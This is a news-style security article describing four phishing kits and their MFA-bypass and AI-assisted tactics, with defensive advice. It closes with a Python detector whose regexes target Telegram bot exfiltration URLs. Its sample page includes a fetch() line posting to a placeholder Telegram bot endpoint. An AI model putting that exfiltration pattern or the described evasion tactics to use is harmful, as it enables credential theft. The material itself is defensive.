New Phishing Kits: AI-Driven MFA Bypass Techniques Target Credentials at Scale


New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale

Four sophisticated phishing kits—BlackForce, GhostFrame, InboxPrime AI, and Spiderman—have emerged in 2025, employing AI assistance and MFA bypass techniques to steal credentials from thousands of users worldwide. Researchers report these toolkits are being actively marketed on messaging platforms for prices ranging from $234 to $1,000.

Cybersecurity experts warn these kits represent a significant evolution in phishing attacks, lowering barriers to entry for cybercriminals while dramatically increasing the scale and sophistication of credential theft operations. The tools specifically target banking, streaming, and corporate credentials across multiple regions, with a focus on European financial institutions.

How the new phishing kits work

BlackForce, first detected in August 2025, has quickly evolved through multiple versions and targets over 11 major brands including Disney, Netflix, DHL, and UPS. Selling for €200-300 ($234-351) on Telegram forums, this toolkit employs advanced evasion techniques and Man-in-the-Browser (MitB) attacks to capture login credentials and bypass sophisticated multi-factor authentication systems.

"BlackForce features several evasion techniques with a blocklist that filters out security vendors, web crawlers, and scanners," according to Zscaler ThreatLabz researchers Gladis Brinda R and Ashwathi Sasi.

The attack sequence begins when victims click malicious links redirecting them to convincing fake websites. Once credentials are entered, they're instantly transmitted to attackers through Telegram bots and control panels. When victims receive legitimate MFA prompts, BlackForce displays fake MFA pages that capture authentication codes, giving attackers full account access.

After completing the attack, victims are redirected to legitimate websites, leaving no evidence of compromise. The kit employs "cache busting" techniques by using JavaScript files with unique hashes, forcing browsers to download the latest malicious script rather than using cached versions.

GhostFrame, discovered in September 2025, uses a different approach focused on stealth. Its architecture centers on a seemingly harmless HTML file that conceals malicious behavior within an embedded iframe leading to phishing login pages targeting Microsoft 365 and Google accounts.

"The iframe design also allows attackers to easily switch out the phishing content, try new tricks or target specific regions, all without changing the main web page that distributes the kit," explained Barracuda researcher Sreyas Shetty.

This kit generates random subdomains with each visit and employs anti-analysis techniques preventing browser inspection. It has already facilitated over one million phishing attempts while evading traditional security solutions.

Technical indicators of compromise

Security professionals should be aware of these common indicators that may signal these new phishing toolkits in action:

  • Unusual iframe implementations with dynamically changing content
  • Random subdomain generation patterns
  • JavaScript files with unique hash parameters
  • Telegram webhook API calls embedded in page source
  • MFA interception pages that closely mimic legitimate authentication screens

AI automation takes phishing to new levels

InboxPrime AI represents perhaps the most concerning advancement, leveraging artificial intelligence technology previously reserved for legitimate enterprise applications to automate mass phishing campaigns. Available as a malware-as-a-service subscription for $1,000, it provides perpetual licenses and source code access through a Telegram channel with over 1,300 members.

"It is designed to mimic real human emailing behavior and even leverages Gmail's web interface to evade traditional filtering mechanisms," according to Abnormal researchers Callie Baron and Piotr Wojtyla.

The platform offers a professional interface resembling legitimate email marketing software, allowing criminals to manage accounts, proxies, templates, and campaigns with ease. Its most powerful feature is an AI-powered email generator that creates convincing phishing lures tailored to specific industries, languages, and communication styles.

Additional capabilities include:

  • Real-time spam diagnostics that analyze emails for filter triggers and suggest corrections
  • Sender identity randomization and spoofing to customize Gmail display names
  • Spintax support to create email variations that bypass signature-based detection

"This industrialization of phishing has direct implications for defenders: more attackers can now launch more campaigns with more volume, without any corresponding increase in defender bandwidth or resources," warned Abnormal Security.

European banks under targeted attacks

The fourth kit, Spiderman, specifically targets European financial institutions and government portals. Unlike the other kits, which are marketed on Telegram, Spiderman is sold through a Signal channel with approximately 750 members.

"Spiderman is a full-stack phishing framework that replicates dozens of European banking login pages, and even some government portals," Varonis researcher Daniel Kelley reported.

The kit creates pixel-perfect replicas of banking sites from institutions including Blau, CaixaBank, Deutsche Bank, ING, Volksbank, Klarna, and PayPal, with primary targets in Germany, Austria, Switzerland, and Belgium.

Spiderman captures cryptocurrency wallet seed phrases, intercepts one-time passwords and PhotoTAN codes, and gathers credit card information through multi-step attacks specifically designed for European banking systems where credentials alone are insufficient for transactions.

"After capturing credentials, Spiderman logs each session with a unique identifier so the attacker can maintain continuity through the entire phishing workflow," Kelley explained.

Banking sector vulnerabilities

European financial institutions face unique challenges with these attacks due to:

  • Multi-layered authentication processes that are now being systematically bypassed
  • PhotoTAN and chip-based authentication systems specifically targeted by Spiderman
  • Highly regionalized banking interfaces being replicated with precision
  • Customer trust in official communication channels being exploited

The evolving threat landscape

These four kits join an expanding list of phishing frameworks developed over the past year, including Tycoon 2FA, Salty 2FA, Sneaky 2FA, Whisper 2FA, Cephas, and Astaroth. Security researchers have recently observed hybrid attacks combining techniques from multiple kits.

ANY.RUN recently documented a Salty-Tycoon hybrid that bypasses detection rules tuned to either kit individually. This development coincided with a sharp drop in Salty 2FA activity in late October 2025, with the hybrid using early-stage techniques from Salty 2FA before loading code that mimics Tycoon 2FA's execution.

"This overlap marks a meaningful shift; one that weakens kit-specific rules, complicates attribution, and gives threat actors more room to slip past early detection," ANY.RUN reported.

As these phishing toolkits continue to evolve, organizations must understand the various types of phishing attacks and their distinctive characteristics to implement appropriate defensive measures.

How to protect yourself and your organization

Given the sophistication of these new phishing kits, individuals and organizations should implement multiple layers of protection:

  • Enable phishing-resistant MFA methods like hardware keys when available, as they cannot be intercepted like SMS or app-based codes
  • Verify website URLs carefully before entering credentials, looking for subtle misspellings or unusual domains
  • Use password managers that can detect when legitimate sites are being impersonated
  • Implement email security solutions that can detect AI-generated content
  • Train employees to recognize phishing attempts, especially those claiming to be about invoices or password resets
  • Deploy security tools that can detect iframe-based attacks and domain-switching techniques

The rapid evolution of these phishing kits demonstrates how cybercriminals continue to industrialize their operations, making sophisticated attacks accessible to less technical threat actors. With AI now automating customized phishing campaigns, organizations must remain vigilant and adapt their security strategies accordingly.

Enhanced defensive strategies

Beyond the standard recommendations, organizations should consider these advanced protection measures against the latest phishing toolkits:

  • Implement email authentication protocols like DMARC, SPF, and DKIM to prevent domain spoofing tactics used by InboxPrime AI
  • Deploy browser isolation technology that renders web content in a secure container, protecting against BlackForce and GhostFrame's browser-based attacks
  • Utilize AI-based security solutions that can detect anomalous login attempts and suspicious session behaviors indicative of MFA bypass attempts
  • Establish robust incident response procedures specifically for credential theft, including rapid account lockdown capabilities and predetermined communication channels for security alerts

According to the SANS Internet Storm Center, organizations experiencing these advanced phishing attacks should immediately implement network monitoring for Telegram API calls and suspicious iframe loading patterns to detect compromise attempts before credentials are exfiltrated.
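To turn the indicators listed above (the iframe, random-subdomain, hashed-script and Telegram API patterns under "Technical indicators of compromise", and the monitoring the SANS ISC note recommends here) into something a defender can actually run, the following is an added example, not code from the article or from any of the cited vendors: a small Python heuristic scanner over captured page source. The regular expressions, the random-label heuristic, its thresholds, and the sample pages are assumptions constructed for illustration and should be tuned against your own telemetry.

```python
import re
from urllib.parse import urlparse

# Regexes are assumptions tuned for this example, not published kit signatures.
IFRAME_RE = re.compile(r"<iframe[^>]*\ssrc=[\"']([^\"']+)[\"']", re.I)
SCRIPT_RE = re.compile(r"<script[^>]*\ssrc=[\"']([^\"']+)[\"']", re.I)
TELEGRAM_RE = re.compile(r"https?://api\.telegram\.org/bot[^\s\"'<>]+", re.I)
# Cache-busting style: a query parameter whose value is a long hex digest or token.
HASH_PARAM_RE = re.compile(r"[?&][a-z_]*=(?:[0-9a-f]{16,}|[A-Za-z0-9_-]{24,})", re.I)
INDICATORS = ("iframes", "cache_busted_scripts", "telegram_urls", "random_subdomains")


def looks_random(label: str) -> bool:
    """Assumed heuristic: a long, vowel-poor or digit-heavy DNS label suggests generation."""
    if len(label) < 8:
        return False
    vowels = sum(c in "aeiou" for c in label.lower())
    digits = sum(c.isdigit() for c in label)
    return vowels / len(label) < 0.25 or digits >= 3


def scan_page(html: str) -> dict:
    """Return per-indicator hits plus a score = number of indicator classes present."""
    hits = {name: [] for name in INDICATORS}
    hits["iframes"] = IFRAME_RE.findall(html)
    hits["cache_busted_scripts"] = [s for s in SCRIPT_RE.findall(html) if HASH_PARAM_RE.search(s)]
    hits["telegram_urls"] = TELEGRAM_RE.findall(html)
    for url in hits["iframes"] + SCRIPT_RE.findall(html):
        host = urlparse(url).hostname or ""
        labels = host.split(".")
        if len(labels) > 2 and looks_random(labels[0]) and host not in hits["random_subdomains"]:
            hits["random_subdomains"].append(host)
    hits["score"] = sum(1 for name in INDICATORS if hits[name])
    return hits


# Constructed sample pages; hosts and the bot token are placeholders, not real indicators.
SUSPICIOUS_HTML = """<html><body>
<iframe src="https://x7k2q9vb3.portal-login.example/auth" style="border:0"></iframe>
<script src="https://cdn.example/app.js?v=3f9a1c7e2b4d8e6f"></script>
<script>fetch("https://api.telegram.org/botPLACEHOLDER-TOKEN/sendMessage");</script>
</body></html>"""
BENIGN_HTML = """<html><body>
<script src="https://cdn.example/app.js?v=2"></script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("suspicious", SUSPICIOUS_HTML), ("benign", BENIGN_HTML)):
        result = scan_page(page)
        print(name, "score", result["score"], {k: result[k] for k in INDICATORS if result[k]})
```

A score counts how many indicator classes co-occur in one page, which is a more useful triage signal than any single pattern, since hashed script URLs or iframes alone are common on legitimate sites.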
